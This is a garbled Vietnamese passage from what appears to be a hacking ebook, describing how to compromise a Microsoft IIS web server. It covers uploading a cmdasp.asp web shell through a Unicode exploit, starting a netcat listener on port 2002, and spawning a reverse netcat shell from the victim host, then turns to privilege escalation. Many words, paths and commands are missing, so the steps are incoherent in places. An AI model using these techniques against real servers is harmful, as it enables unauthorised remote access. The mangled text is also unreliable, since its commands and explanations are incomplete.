Tham khảo tài liệu 'hacker professional ebook part 256', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | C winnt system32 thành một file tên là trên thư mục chỉ định như tham số web root hay nói cho dễ hiểu ở đây chính là c inetpub scripts . Như đã nói nó được đổi tên để tránh sự vô hiệu hoá - redirect qua khai thác sau đó sử dụng để echo redirect file và lần lượt vào web root directory ở đây là inetpub scripts . Khi và các file cần thiết đã ở trên server thì ta có thể sử dụng web browser để upload nhiều file hơn xem hình vẽ user posted image Để có thể đoạt quyền kiểm soát server attacker có lẽ sẽ upload 2 file khác sử dụng script .File đầu tiên có lẽ là một thời gian ngắn sau hacker Maceo viết dựa trên script chạy lệnh sử dụng các khai thác Unicode từ trong web browser của có một giao diện đồ họa dễ dàng cho việc sử dụng và chạy các lệnh unicode xem hình vẽ user posted image Chỉ việc đánh vào browser như sau http scripts http victim. com scripts cmdasp. asp Với đã upload và khả năng chạy lệnh của cho thấy một shell với hệ thống của attacker là không cần thiết bắt đầu lằng nghe bằng netcat trên hệ thống của attacker như sau C nc -l -p 2002 Sau đó sử dụng để tạo ra một netcat shell bằng việc nhập vào lệnh sau vào form và ấn Run c inetpub scripts -v -e 2002 Và giờ đây hãy nhìn vào cửa sổ command của chúng ta nơi mà đang chạy netcat listener trên cổng 2002 như hình vẽ bạn sẽ thấy 1 shell lệnh được hiện đây đã chạy ipconfig trên remote shell để minh họa rằng máy victim là dual-homed Leo thang đặc quyền trên iis Một vài khai thác leo thang đặc quyền tồn tại trên windows nt và nhiên rất nhiều trong số chúng yêu cầu các shell tương thích để có thể được gọi thành remote web session không được xem như một session tưong thích của windows do vậy nên những khai thác này là không khả thi vớ web servic chỉ là có thể vươn tới thông qua một kẻ lừa đảo.